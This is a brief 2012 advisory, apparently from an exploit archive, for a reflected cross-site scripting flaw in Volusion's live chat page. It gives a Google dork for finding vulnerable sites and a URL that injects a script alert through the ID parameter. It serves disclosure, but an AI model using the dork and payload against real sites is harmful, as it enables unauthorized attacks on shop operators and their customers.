Volusion Chat suffers from a cross site scripting vulnerability.
270904e7e12f13596a1278f3d5039ba28bbf74c51d5ac4e023c842bd92bdc64a
# Exploit Title: Volusion Chat Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://www.volusion.com/
# Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered
by volusion
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/03/volusion-chat-cross-site-scripting.html
..................................................................
https://livechat03.volusion.com/livechat.aspx?ID=24342[our xss is
here]&location=http%3A//www.volusion.com/&auto=0&cookieGuid=
https://livechat03.volusion.com/livechat.aspx?ID=24342%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&location=http%3A//www.volusion.com/&auto=0&cookieGuid=
http://4.bp.blogspot.com/-CSpnn8fNIYY/T2EGeu_u41I/AAAAAAAAAvM/TcpwDTdCLUA/s1600/volusion.JPG
..................................................................
InSecurity.Ro
Because we care, we're security aware!